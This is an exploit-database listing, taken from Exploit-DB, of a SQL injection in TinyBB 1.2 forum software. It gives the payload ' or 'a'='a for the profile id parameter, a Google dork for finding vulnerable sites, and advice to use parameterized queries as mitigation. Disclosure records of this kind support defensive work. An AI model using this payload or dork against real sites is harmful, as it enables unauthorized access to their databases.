header-logo
Suggest Exploit
vendor:
TinyBB
by:
Aodrulez
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: TinyBB
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 10.04
2011

TinyBB 1.2 SQLi Vulnerability

TinyBB Version 1.2 is vulnerable to SQLi. The exploit can be performed by appending ' or 'a'='a to the profile ID parameter in the URL.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL injection attacks.
Source

Exploit-DB raw data:

+-------------------------------+
| TinyBB 1.2 SQLi Vulnerability |
+-------------------------------+



Vulnerable Web-App : TinyBB 1.2
Vulnerability      : SQL Injection.
Author             : Aodrulez.
Email              : f3arm3d3ar@gmail.com
Google-Dork        : "TinyBB 2011 all rights reserved"
Tested on          : Ubuntu 10.04

+---------+
| Exploit |
+---------+

TinyBB Version 1.2 is vulnerable to SQLi.

http://127.0.0.1/index.php?page=profile&id=' or 'a'='a


+-------------------+
| Greetz Fly Out To |
+-------------------+
 

1] Amforked()          : My Mentor.
2] The Blue Genius     : My Boss.
3] www.orchidseven.com
4] www.malcon.org

Navigation

Suggest Exploit

Services By CQR